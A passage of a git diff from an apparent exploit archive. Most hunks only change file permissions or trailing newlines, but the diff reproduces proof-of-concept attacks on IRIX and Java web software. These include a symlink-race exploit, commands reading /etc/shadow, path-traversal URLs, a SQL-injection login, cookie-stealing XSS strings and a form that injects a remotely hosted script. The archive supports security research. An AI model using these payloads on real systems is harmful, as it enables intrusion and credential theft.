");fflush(stdout); + chdir("/var/tmp"); + dirp=opendir("."); + while(1){ + if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;} + if(!strncmp(dentp->d_name,".ilmpAAA",8)) break; + } + closedir(dirp); + printf("found!\n"); + while(1){ + if(!symlink(argv[1],dentp->d_name)) break; + } + sleep(2); + unlink(dentp->d_name); - execl("/bin/ls","ls","-l",argv[1],0); - } \ No newline at end of file + execl("/bin/ls","ls","-l",argv[1],0); +} \ No newline at end of file diff --git a/platforms/irix/local/20137.c b/platforms/irix/local/20137.c old mode 100755 new mode 100644 index 97b7e5769..cfe12d338 --- a/platforms/irix/local/20137.c +++ b/platforms/irix/local/20137.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/1540/info The truncate() system call on a number of versions of the IRIX operating system (with the xfs file system) does not properly check permissions before truncating a file, making it possible for unprivileged users to damage files to which they would otherwise not have write access. Although only versions 6.2, 6.3, and 6.4 are listed as vulnerable other versions may exhibit this behaviour as well. +*/ /*## copyright LAST STAGE OF DELIRIUM feb 1997 poland *://lsd-pl.net/ #*/ /*## truncate #*/ diff --git a/platforms/irix/local/20138.c b/platforms/irix/local/20138.c old mode 100755 new mode 100644 index 5b9920f7b..a7b54c97c --- a/platforms/irix/local/20138.c +++ b/platforms/irix/local/20138.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/1542/info The mail(1) program, also know as mail_att, is used to read or send email. A buffer overflow condition exists in code that handles the LOGNAME environment variable. This could be exploited to elevate privileges. +*/ /*## copyright LAST STAGE OF DELIRIUM sep 1997 poland *://lsd-pl.net/ #*/ /*## /usr/bin/mail #*/ diff --git a/platforms/irix/local/20263.txt b/platforms/irix/local/20263.txt old mode 100755 new mode 100644 index 3e6840a83..f3062ed21 --- a/platforms/irix/local/20263.txt +++ b/platforms/irix/local/20263.txt @@ -6,4 +6,4 @@ This is SGI SCR # 265071. If you attempt to change the permissions of a file you don't have privileges for the permissions tool will prompt you for the name and password of a privileged user. But the permission changes are made to the target file before the tool prompts you for the password if you double click "Apply". -Run /usr/lib/desktop/permissions aganist the file which permissions you want to modify. Change the permissions. Click on the 'Apply' button twice before the dialog box appears asking you for a username and password. Click the 'Cancel' button. \ No newline at end of file +Run /usr/lib/desktop/permissions aganist the file which permissions you want to modify. Change the permissions. Click on the 'Apply' button twice before the dialog box appears asking you for a username and password. Click the 'Cancel' button. \ No newline at end of file diff --git a/platforms/irix/local/20804.c b/platforms/irix/local/20804.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/20937.c b/platforms/irix/local/20937.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/21720.txt b/platforms/irix/local/21720.txt old mode 100755 new mode 100644 diff --git a/platforms/irix/local/25361.txt b/platforms/irix/local/25361.txt old mode 100755 new mode 100644 index 50773ac58..1f8fb782f --- a/platforms/irix/local/25361.txt +++ b/platforms/irix/local/25361.txt @@ -4,4 +4,4 @@ gr_osview is reported prone to an information disclosure vulnerability. This iss This issue has been confirmed in SGI IRIX 6.5.22 maintenance release. Other versions of IRIX may be vulnerable as well. -gr_osview -d -D /etc/shadow \ No newline at end of file +gr_osview -d -D /etc/shadow \ No newline at end of file diff --git a/platforms/irix/local/25362.txt b/platforms/irix/local/25362.txt old mode 100755 new mode 100644 index d3a577c98..74d8869e4 --- a/platforms/irix/local/25362.txt +++ b/platforms/irix/local/25362.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to cause the affected utility to write data It should be noted that although only SGI IRIX 6.5.22(maintenance) has been confirmed vulnerable, it is likely that all IRIX 6.5 versions are affected as well. -gr_osview -s /etc/shadow \ No newline at end of file +gr_osview -s /etc/shadow \ No newline at end of file diff --git a/platforms/irix/local/334.c b/platforms/irix/local/334.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/336.c b/platforms/irix/local/336.c old mode 100755 new mode 100644 diff --git a/platforms/irix/local/337.c b/platforms/irix/local/337.c old mode 100755 new mode 100644 diff --git a/platforms/irix/remote/19316.c b/platforms/irix/remote/19316.c old mode 100755 new mode 100644 diff --git a/platforms/irix/remote/19788.pl b/platforms/irix/remote/19788.pl index b9f07ad12..1b6b26f11 100755 --- a/platforms/irix/remote/19788.pl +++ b/platforms/irix/remote/19788.pl @@ -45,4 +45,4 @@ while(!eof(STDIN)) { chomp($cmd = <STDIN>); print send_cmd($cmd); prompt; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/irix/remote/19822.c b/platforms/irix/remote/19822.c old mode 100755 new mode 100644 diff --git a/platforms/irix/remote/19949.c b/platforms/irix/remote/19949.c old mode 100755 new mode 100644 diff --git a/platforms/irix/remote/20149.c b/platforms/irix/remote/20149.c old mode 100755 new mode 100644 diff --git a/platforms/irix/remote/20805.c b/platforms/irix/remote/20805.c old mode 100755 new mode 100644 diff --git a/platforms/irix/remote/21571.c b/platforms/irix/remote/21571.c old mode 100755 new mode 100644 diff --git a/platforms/java/dos/27882.java b/platforms/java/dos/27882.java old mode 100755 new mode 100644 diff --git a/platforms/java/dos/32860.txt b/platforms/java/dos/32860.txt old mode 100755 new mode 100644 index 3fa5122d7..13e9f518b --- a/platforms/java/dos/32860.txt +++ b/platforms/java/dos/32860.txt @@ -8,4 +8,4 @@ NOTE: Versions prior to Sun Java System Calendar Server 6.3 are not vulnerable. The following example data is available: -https://www.example.com:3443/?tzid=crash \ No newline at end of file +https://www.example.com:3443/?tzid=crash \ No newline at end of file diff --git a/platforms/java/dos/41965.txt b/platforms/java/dos/41965.txt old mode 100755 new mode 100644 diff --git a/platforms/java/remote/28887.txt b/platforms/java/remote/28887.txt old mode 100755 new mode 100644 diff --git a/platforms/java/remote/30502.txt b/platforms/java/remote/30502.txt old mode 100755 new mode 100644 diff --git a/platforms/java/remote/39007.txt b/platforms/java/remote/39007.txt old mode 100755 new mode 100644 diff --git a/platforms/java/remote/39854.txt b/platforms/java/remote/39854.txt old mode 100755 new mode 100644 diff --git a/platforms/java/remote/41366.java b/platforms/java/remote/41366.java old mode 100755 new mode 100644 diff --git a/platforms/java/remote/42701.rb b/platforms/java/remote/42701.rb index 42d682f7b..b3efc9374 100755 --- a/platforms/java/remote/42701.rb +++ b/platforms/java/remote/42701.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/java/remote/42702.rb b/platforms/java/remote/42702.rb index 59e1fca40..4ec9a1d9c 100755 --- a/platforms/java/remote/42702.rb +++ b/platforms/java/remote/42702.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/java/remote/42756.py b/platforms/java/remote/42756.py index 668aa7486..3da144592 100755 --- a/platforms/java/remote/42756.py +++ b/platforms/java/remote/42756.py @@ -101,4 +101,4 @@ if __name__ == "__main__": else: print "[-] Can't load ysoserial.jar" else: - printUsage() + printUsage() \ No newline at end of file diff --git a/platforms/java/remote/42806.py b/platforms/java/remote/42806.py index 86dd4f6f2..28de0db3f 100755 --- a/platforms/java/remote/42806.py +++ b/platforms/java/remote/42806.py @@ -93,5 +93,4 @@ sock.send(payload) print "[+]Done! You should see ICMP ECHO requests from your target to your attacking machine!!" print("\n[+]Response to Request#: \n") response = sock.recv(15000) -print(response) - +print(response) \ No newline at end of file diff --git a/platforms/java/webapps/18881.txt b/platforms/java/webapps/18881.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/20925.txt b/platforms/java/webapps/20925.txt old mode 100755 new mode 100644 index f8c7fb315..54aba7ce5 --- a/platforms/java/webapps/20925.txt +++ b/platforms/java/webapps/20925.txt @@ -4,4 +4,4 @@ Screaming Media is a provider for custom web content. SiteWare Editor Desktop is SiteWare Editor Desktop is prone to directory traversal attacks which can lead to disclosure of arbitrary webserver-readable files on the vulnerable host. This is due to the fact that the software does not filter '../' character sequences from HTTP Requests. -http://server:port/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/passwd \ No newline at end of file +http://server:port/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/java/webapps/21543.txt b/platforms/java/webapps/21543.txt old mode 100755 new mode 100644 index fd8b432d6..a6fc7dd31 --- a/platforms/java/webapps/21543.txt +++ b/platforms/java/webapps/21543.txt @@ -4,4 +4,4 @@ Ruslan Communications <Body>Builder is a tool designed to assist a user in creat Reportedly, user input supplied as the login password is not adequately filtered. A malicious user may include special characters in the supplied password and modify the SQL query used to validate the user. Access to the administrative interface is possible. -Use login='-- and pass='-- \ No newline at end of file +Use login='-- and pass='-- \ No newline at end of file diff --git a/platforms/java/webapps/21562.txt b/platforms/java/webapps/21562.txt old mode 100755 new mode 100644 index 4a5be5c55..f791c1b70 --- a/platforms/java/webapps/21562.txt +++ b/platforms/java/webapps/21562.txt @@ -4,4 +4,4 @@ Wolfram Research's webMathematica is a Java based product which allows the inclu A file disclosure vulnerability has been reported with the MSP CGI program. A file name parameter supplied by the user is not properly validated. The inclusion of "../" character sequences allows the attacker to escape the web root, and view arbitrary system files. -http://www.domain.com/webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=image/gif \ No newline at end of file +http://www.domain.com/webMathematica/MSP?MSPStoreID=../../../../../etc/passwd&MSPStoreType=image/gif \ No newline at end of file diff --git a/platforms/java/webapps/21879.txt b/platforms/java/webapps/21879.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/21946.txt b/platforms/java/webapps/21946.txt old mode 100755 new mode 100644 index dba221cc9..afc5c1f61 --- a/platforms/java/webapps/21946.txt +++ b/platforms/java/webapps/21946.txt @@ -6,4 +6,4 @@ As a result, it is possible for a remote attacker to create a malicious link con This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. -http://<victim>/usercp.php?s=[Session ID]"><Script>alert(document.cookie);</Script> \ No newline at end of file +http://<victim>/usercp.php?s=[Session ID]"><Script>alert(document.cookie);</Script> \ No newline at end of file diff --git a/platforms/java/webapps/22752.txt b/platforms/java/webapps/22752.txt old mode 100755 new mode 100644 index 2b421cf76..10f90b16a --- a/platforms/java/webapps/22752.txt +++ b/platforms/java/webapps/22752.txt @@ -23,4 +23,4 @@ _name=<h1>XSS http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template -_name=<script>alert(document.cookie);</script> \ No newline at end of file +_name=<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/java/webapps/23268.txt b/platforms/java/webapps/23268.txt old mode 100755 new mode 100644 index 1dd01d9cb..f4d3c8e23 --- a/platforms/java/webapps/23268.txt +++ b/platforms/java/webapps/23268.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8862/info Vivisimo Clustering Engine reported prone to cross-site scripting vulnerability. The problem occurs due to insufficient sanitization of parameters passed to the search script. As a result, an attacker may be capable of constructing a link designed to execute arbitrary script code within the browser of a user who follows it. -http://www.example.com/search?query=<script>alert(document.domain)</script> \ No newline at end of file +http://www.example.com/search?query=<script>alert(document.domain)</script> \ No newline at end of file diff --git a/platforms/java/webapps/24190.txt b/platforms/java/webapps/24190.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/24791.txt b/platforms/java/webapps/24791.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/25702.txt b/platforms/java/webapps/25702.txt old mode 100755 new mode 100644 index 16accf60f..52a18c523 --- a/platforms/java/webapps/25702.txt +++ b/platforms/java/webapps/25702.txt @@ -23,4 +23,4 @@ http://example.com/Download?/etc/passwd http://example.com/Download?/etc/shadow http://example.com/Download?/etc/group http://example.com/Download?/var/log/boot.log -http://example.com/Download?/var/log/maillog \ No newline at end of file +http://example.com/Download?/var/log/maillog \ No newline at end of file diff --git a/platforms/java/webapps/26001.txt b/platforms/java/webapps/26001.txt old mode 100755 new mode 100644 index 8dae386e2..9e11e259f --- a/platforms/java/webapps/26001.txt +++ b/platforms/java/webapps/26001.txt @@ -4,4 +4,4 @@ Novell GroupWise WebAccess is prone to an HTML injection vulnerability. This may Successful exploitation could potentially allow theft of cookie-based authentication. Other attacks are also possible. -<IMG SRC="j&#X41vascript:alert(document.cookie)"> \ No newline at end of file +<IMG SRC="j&#X41vascript:alert(document.cookie)"> \ No newline at end of file diff --git a/platforms/java/webapps/26987.txt b/platforms/java/webapps/26987.txt old mode 100755 new mode 100644 index 4d54d363a..4292135ee --- a/platforms/java/webapps/26987.txt +++ b/platforms/java/webapps/26987.txt @@ -29,4 +29,4 @@ TSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHIT EPAPERS%5F1300483&COUNTRYNAME=[XSS] http://www.example.com/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE -MPLATENAME=[XSS] \ No newline at end of file +MPLATENAME=[XSS] \ No newline at end of file diff --git a/platforms/java/webapps/27888.txt b/platforms/java/webapps/27888.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/28116.txt b/platforms/java/webapps/28116.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/29918.txt b/platforms/java/webapps/29918.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/30271.txt b/platforms/java/webapps/30271.txt old mode 100755 new mode 100644 index 6648d244e..9c20901d3 --- a/platforms/java/webapps/30271.txt +++ b/platforms/java/webapps/30271.txt @@ -4,4 +4,4 @@ OpManager is prone to multiple cross-site scripting vulnerabilities because it f An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73% 74%6D%6F%6E%2E%62%6C%F% 67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%2 1%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%7 9%3E \ No newline at end of file +http://www.example.com/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73% 74%6D%6F%6E%2E%62%6C%F% 67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%2 1%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%7 9%3E \ No newline at end of file diff --git a/platforms/java/webapps/30272.txt b/platforms/java/webapps/30272.txt old mode 100755 new mode 100644 index 0289fb636..056a73ca6 --- a/platforms/java/webapps/30272.txt +++ b/platforms/java/webapps/30272.txt @@ -4,4 +4,4 @@ OpManager is prone to multiple cross-site scripting vulnerabilities because it f An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E \ No newline at end of file +http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E \ No newline at end of file diff --git a/platforms/java/webapps/30273.txt b/platforms/java/webapps/30273.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/30274.txt b/platforms/java/webapps/30274.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/30275.txt b/platforms/java/webapps/30275.txt old mode 100755 new mode 100644 diff --git a/platforms/java/webapps/30514.txt b/platforms/java/webapps/30514.txt old mode 100755 new mode 100644 index 6121b0390..eef4d08b5 --- a/platforms/java/webapps/30514.txt +++ b/platforms/java/webapps/30514.txt @@ -4,4 +4,4 @@ ALeadSoft Search Engine Builder is prone to a cross-site scripting vulnerability An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/search/search.html?searWords=[XSS] \ No newline at end of file +http://www.example.com/search/search.html?searWords=[XSS] \ No newline at end of file diff --git a/platforms/java/webapps/30674.txt b/platforms/java/webapps/30674.txt old mode 100755 new mode 100644 index 9da1e0a76..fafd8dfb4 --- a/platforms/java/webapps/30674.txt +++ b/platforms/java/webapps/30674.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Stringbeans Portal 3.2 is vulnerable; other versions may also be affected. -http://www.example.com/portal/projects?project_id=3&project_name=[XSS] \ No newline at end of file +http://www.example.com/portal/projects?project_id=3&project_name=[XSS] \ No newline at end of file diff --git a/platforms/java/webapps/31073.html b/platforms/java/webapps/31073.html old mode 100755 new mode 100644 index fc8912f91..a3b0ede4f --- a/platforms/java/webapps/31073.html +++ b/platforms/java/webapps/31073.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Banner Student 7.3 is vulnerable; other versions may also be affected. -<html><head><title>Banner Vulnerability Test Case</title></head> <body> <FORM ACTION="https://www.example.com/ss/twbksrch.P_ShowResults" METHOD="POST"> Search <SPAN class=fieldlabeltextinvisible><LABEL for=keyword_in_id><SPAN class=fieldlabeltext>Search</SPAN></LABEL></SPAN> <INPUT TYPE="text" NAME="KEYWRD_IN" SIZE="20" MAXLENGTH="65" ID="keyword_in_id"> <INPUT TYPE="submit" VALUE="Go"> </FORM> </div> </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <SPAN class="pageheaderlinks"> <A HREF="/ss/twbkwbis.P_GenMenu?name=bmenu.P_GenMnu" class="submenulinktext2" >RETURN TO MENU</A> | <A HREF="/ss/twbksite.P_DispSiteMap?menu_name_in=bmenu.P_MainMnu&depth_in=2&columns_in=3" accesskey="2" class="submenulinktext2">SITE MAP</A> | <A HREF="/wtlhelp/twbhhelp.htm" accesskey="H" onClick="popup = window.open('/wtlhelp/twbhhelp.htm', 'PopupPage','height=450,width=500,scrollbars=yes,resizable=yes'); return false" target="_blank" onMouseOver="window.status=''; return true" onMouseOut="window.status=''; return true"onFocus="window.status=''; return true" onBlur="window.status=''; return true" class="submenulinktext2">HELP</A> | <A HREF="twbkwbis.P_Logout" accesskey="3" class="submenulinktext2">EXIT</A> </span> </TD> </TR> </TABLE> </DIV> <DIV class="pagetitlediv"> <TABLE CLASS="plaintable" SUMMARY="This table displays title and static header displays." WIDTH="100%"> <TR> <TD CLASS="pldefault"> <H2>Update Emergency Contacts</H2> </TD> <TD CLASS="pldefault"> &nbsp; </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <DIV class="staticheaders"> </div> </TD> </TR> <TR> <TD class="bg3" width="100%" colSpan=3><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image" NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD> </TR> </TABLE> <a name="main_content"></a> </DIV> <DIV class="pagebodydiv"> <!-- ** END OF twbkwbis.P_OpenDoc ** --> <DIV class="infotextdiv"><TABLE CLASS="infotexttable" SUMMARY="This layout table contains information that may be helpful in understanding the content and functionality of this page. It could be a brief set of instructions, a description of error messages, or other special information."><TR><TD CLASS="indefault">&nbsp;</TD><TD CLASS="indefault"><SPAN class=infotext> Enter a new emergency contact. When finished, Submit Changes. </SPAN></TD></TR></TABLE><P></DIV> <FORM NAME="MyForm" ACTION="https://www.example.com:9170/ssINTG/bwgkoemr.P_UpdateEmrgContacts" METHOD="post"> <INPUT TYPE="hidden" NAME="oldpri" VALUE="2"> <INPUT TYPE="hidden" NAME="last_active" VALUE="20070821154753"> <TABLE CLASS="dataentrytable" SUMMARY="This layout table is used to format the Emergency Contacts form."> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=remove_id><SPAN class=fieldlabeltext>Remove Contact:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"><INPUT TYPE="checkbox" NAME="remove_it" ID="remove_id"></TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=priority_id><SPAN class=fieldlabeltext>Order:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="priority_in" SIZE="2" MAXLENGTH="1" VALUE="2" ID="priority_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=rship_id><SPAN class=fieldlabeltext>Relationship:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="rship" SIZE="1" ID="rship_id"> <OPTION VALUE="" SELECTED>Not Applicable <OPTION VALUE="A">An Ex-spouse </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=fname_id><SPAN class=fieldlabeltext>First Name:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="fname" SIZE="20" MAXLENGTH="15" ID="fname_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=mi_id><SPAN class=fieldlabeltext>Middle Initial:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="mi" SIZE="2" MAXLENGTH="1" ID="mi_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=lname_id><SPAN class=fieldlabeltext>Last Name:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="lname" SIZE="35" MAXLENGTH="25" ID="lname_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr1_id><SPAN class=fieldlabeltext>Address Line 1:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr1" SIZE="35" MAXLENGTH="30" ID="addr1_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr2_id><SPAN class=fieldlabeltext>Address Line 2:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr2" SIZE="35" MAXLENGTH="30" ID="addr2_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr3_id><SPAN class=fieldlabeltext>Address Line 3:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr3" SIZE="35" MAXLENGTH="30" ID="addr3_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=city_id><SPAN class=fieldlabeltext>City:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="city" SIZE="30" MAXLENGTH="20" ID="city_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=stat_id><SPAN class=fieldlabeltext>State or Province:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="stat" SIZE="1" ID="stat_id"> <OPTION VALUE="" SELECTED>Not Applicable <OPTION VALUE="RI">Rhode Island </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=zip_id><SPAN class=fieldlabeltext>Zip or Postal Code:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="zip" SIZE="11" MAXLENGTH="10" ID="zip_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=natn_id><SPAN class=fieldlabeltext>Country:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="natn" SIZE="1" ID="natn_id"> <OPTION VALUE="" SELECTED>Not Applicable OPTION VALUE="US">United States </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=area_id><SPAN class=fieldlabeltext>Area Code:</SPAN></LABEL></TD> <TD COLSPAN="1" CLASS="dedefault"> <INPUT TYPE="text" NAME="area" SIZE="4" MAXLENGTH="3" ID="area_id"> <TD CLASS="delabel" scope="row" ><LABEL for=phone_id><SPAN class=fieldlabeltext>Phone Number:</SPAN></LABEL></TD> <TD CLASS="dedefault"><INPUT TYPE="text" NAME="phone" SIZE="9" MAXLENGTH="8" ID="phone_id"></TD> <TD CLASS="delabel" scope="row" ><LABEL for=ext_id><SPAN class=fieldlabeltext>Extension:</SPAN></LABEL></TD> <TD CLASS="dedefault"><INPUT TYPE="text" NAME="ext" SIZE="5" MAXLENGTH="4" ID="ext_id"></TD> </TR> </TABLE> <P> <INPUT TYPE="submit" VALUE="Submit Changes"> <INPUT TYPE="reset" VALUE="Reset"> </FORM> <script> document.MyForm.addr1.value='\<script src=http://www.example2.com/s>'; document.MyForm.natn.value='US'; document.MyForm.stat.value='RI'; document.MyForm.fname.value='NAME'; document.MyForm.lname.value='NAME'; document.MyForm.city.value='Providence'; document.MyForm.zip.value='02912'; document.MyForm.submit(); </script> </body> </html> \ No newline at end of file +<html><head><title>Banner Vulnerability Test Case</title></head> <body> <FORM ACTION="https://www.example.com/ss/twbksrch.P_ShowResults" METHOD="POST"> Search <SPAN class=fieldlabeltextinvisible><LABEL for=keyword_in_id><SPAN class=fieldlabeltext>Search</SPAN></LABEL></SPAN> <INPUT TYPE="text" NAME="KEYWRD_IN" SIZE="20" MAXLENGTH="65" ID="keyword_in_id"> <INPUT TYPE="submit" VALUE="Go"> </FORM> </div> </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <SPAN class="pageheaderlinks"> <A HREF="/ss/twbkwbis.P_GenMenu?name=bmenu.P_GenMnu" class="submenulinktext2" >RETURN TO MENU</A> | <A HREF="/ss/twbksite.P_DispSiteMap?menu_name_in=bmenu.P_MainMnu&depth_in=2&columns_in=3" accesskey="2" class="submenulinktext2">SITE MAP</A> | <A HREF="/wtlhelp/twbhhelp.htm" accesskey="H" onClick="popup = window.open('/wtlhelp/twbhhelp.htm', 'PopupPage','height=450,width=500,scrollbars=yes,resizable=yes'); return false" target="_blank" onMouseOver="window.status=''; return true" onMouseOut="window.status=''; return true"onFocus="window.status=''; return true" onBlur="window.status=''; return true" class="submenulinktext2">HELP</A> | <A HREF="twbkwbis.P_Logout" accesskey="3" class="submenulinktext2">EXIT</A> </span> </TD> </TR> </TABLE> </DIV> <DIV class="pagetitlediv"> <TABLE CLASS="plaintable" SUMMARY="This table displays title and static header displays." WIDTH="100%"> <TR> <TD CLASS="pldefault"> <H2>Update Emergency Contacts</H2> </TD> <TD CLASS="pldefault"> &nbsp; </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <DIV class="staticheaders"> </div> </TD> </TR> <TR> <TD class="bg3" width="100%" colSpan=3><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image" NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD> </TR> </TABLE> <a name="main_content"></a> </DIV> <DIV class="pagebodydiv"> <!-- ** END OF twbkwbis.P_OpenDoc ** --> <DIV class="infotextdiv"><TABLE CLASS="infotexttable" SUMMARY="This layout table contains information that may be helpful in understanding the content and functionality of this page. It could be a brief set of instructions, a description of error messages, or other special information."><TR><TD CLASS="indefault">&nbsp;</TD><TD CLASS="indefault"><SPAN class=infotext> Enter a new emergency contact. When finished, Submit Changes. </SPAN></TD></TR></TABLE><P></DIV> <FORM NAME="MyForm" ACTION="https://www.example.com:9170/ssINTG/bwgkoemr.P_UpdateEmrgContacts" METHOD="post"> <INPUT TYPE="hidden" NAME="oldpri" VALUE="2"> <INPUT TYPE="hidden" NAME="last_active" VALUE="20070821154753"> <TABLE CLASS="dataentrytable" SUMMARY="This layout table is used to format the Emergency Contacts form."> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=remove_id><SPAN class=fieldlabeltext>Remove Contact:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"><INPUT 